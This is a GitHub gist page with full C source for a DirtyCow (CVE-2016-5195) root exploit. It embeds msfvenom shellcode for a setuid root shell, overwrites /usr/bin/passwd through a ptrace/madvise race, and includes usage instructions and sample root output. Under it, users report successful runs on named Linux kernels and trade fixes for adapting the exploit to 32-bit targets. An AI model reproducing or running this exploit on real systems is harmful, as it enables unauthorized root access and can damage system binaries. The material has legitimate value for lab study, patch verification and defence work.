-
-
Save KrE80r/42f8629577db95782d5e4f609f437a54 to your computer and use it in GitHub Desktop.
| /* | |
| * A PTRACE_POKEDATA variant of CVE-2016-5195 | |
| * should work on RHEL 5 & 6 | |
| * | |
| * (un)comment correct payload (x86 or x64)! | |
| * $ gcc -pthread c0w.c -o c0w | |
| * $ ./c0w | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * mmap fa65a000 | |
| * madvise 0 | |
| * ptrace 0 | |
| * $ /usr/bin/passwd | |
| * [root@server foo]# whoami | |
| * root | |
| * [root@server foo]# id | |
| * uid=0(root) gid=501(foo) groups=501(foo) | |
| * @KrE80r | |
| */ | |
| #include <fcntl.h> | |
| #include <pthread.h> | |
| #include <string.h> | |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <sys/mman.h> | |
| #include <sys/stat.h> | |
| #include <sys/types.h> | |
| #include <sys/wait.h> | |
| #include <sys/ptrace.h> | |
| #include <unistd.h> | |
| int f; | |
| void *map; | |
| pid_t pid; | |
| pthread_t pth; | |
| struct stat st; | |
| // change if no permissions to read | |
| char suid_binary[] = "/usr/bin/passwd"; | |
| /* | |
| * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i | |
| */ | |
| unsigned char shell_code[] = { | |
| 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, | |
| 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, | |
| 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, | |
| 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, | |
| 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 | |
| }; | |
| unsigned int sc_len = 177; | |
| /* | |
| * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i | |
| unsigned char shell_code[] = { | |
| 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, | |
| 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, | |
| 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, | |
| 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, | |
| 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, | |
| 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, | |
| 0x89, 0xe1, 0xcd, 0x80 | |
| }; | |
| unsigned int sc_len = 136; | |
| */ | |
| void *madviseThread(void *arg) { | |
| int i,c=0; | |
| for(i=0;i<200000000;i++) | |
| c+=madvise(map,100,MADV_DONTNEED); | |
| printf("madvise %d\n\n",c); | |
| } | |
| int main(int argc,char *argv[]){ | |
| printf(" \n\ | |
| (___) \n\ | |
| (o o)_____/ \n\ | |
| @@ ` \\ \n\ | |
| \\ ____, /%s \n\ | |
| // // \n\ | |
| ^^ ^^ \n\ | |
| ", suid_binary); | |
| char *backup; | |
| printf("DirtyCow root privilege escalation\n"); | |
| printf("Backing up %s to /tmp/bak\n", suid_binary); | |
| asprintf(&backup, "cp %s /tmp/bak", suid_binary); | |
| system(backup); | |
| f=open(suid_binary,O_RDONLY); | |
| fstat(f,&st); | |
| map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0); | |
| printf("mmap %x\n\n",map); | |
| pid=fork(); | |
| if(pid){ | |
| waitpid(pid,NULL,0); | |
| int u,i,o,c=0,l=sc_len; | |
| for(i=0;i<10000/l;i++) | |
| for(o=0;o<l;o++) | |
| for(u=0;u<10000;u++) | |
| c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o))); | |
| printf("ptrace %d\n\n",c); | |
| } | |
| else{ | |
| pthread_create(&pth, | |
| NULL, | |
| madviseThread, | |
| NULL); | |
| ptrace(PTRACE_TRACEME); | |
| kill(getpid(),SIGSTOP); | |
| pthread_join(pth,NULL); | |
| } | |
| return 0; | |
| } |
Does it cause system instabilities? see dirtycow/dirtycow.github.io#25
After running, why I execute /usr/bin/passwd it's changing passwd user ?
Sorry for the delay , to answer your questions 👍
1- This if or x86 machines , Android devices run on ARM processors
2- No instability faced while testing , of course no warranty given
3- this exploit overwrites /usr/bin/passwd with a root shell hence you have to run /us/bin/passwd once it's done .
Thanks!
I think I should have a try !
not found in my android /usr/bin/passwd
what to do
Thank you KrE80r.
This has worked perfectly in the below target machine:
Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz GenuineIntel GNU/Linux
There were couple of changes I had to made, which were intuitive enough:
- 1. [ ] Changing the SUID Binary filename to a file which the non privileged user has read access.
- 2. [ ] Change the shellcode to suit my 32 bit target machine
Regards,
Sourish
After the exploit finish i run /usr/bin/passwd and i get this message : Segmentation fault
uname -a : Linux ns1.xxx.com 2.6.32-573.26.1.el6.x86_64 #1 SMP Wed May 4 00:57:44 UTC 2016 x86_64
Any help ?
Thanks.
This is the error that i got:
/tmp/ccfbTOcY.o: In function main': c0w.c:(.text+0x261): undefined reference to pthread_create'
c0w.c:(.text+0x295): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status
Any suggestion Sir?
Same got Segmentation fault
Linux xxx 2.6.32-74-server #142-Ubuntu SMP Tue Apr 28 10:12:19 UTC 2015 x86_64 GNU/Linux
Hi can someone explain how this c0w.c works ??
Hi everyone. I am facing this issue while trying to run this executable
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./c0w)
Any idea of how to solve this, I will appreciate.
I am trying to make that work against metasploitable2 , the exploit didnt gave me any errors but when I run passwd, it says
cannot execute binary files. I am not getting root access? does anyone faced above issue
Help,it does not work on Android device.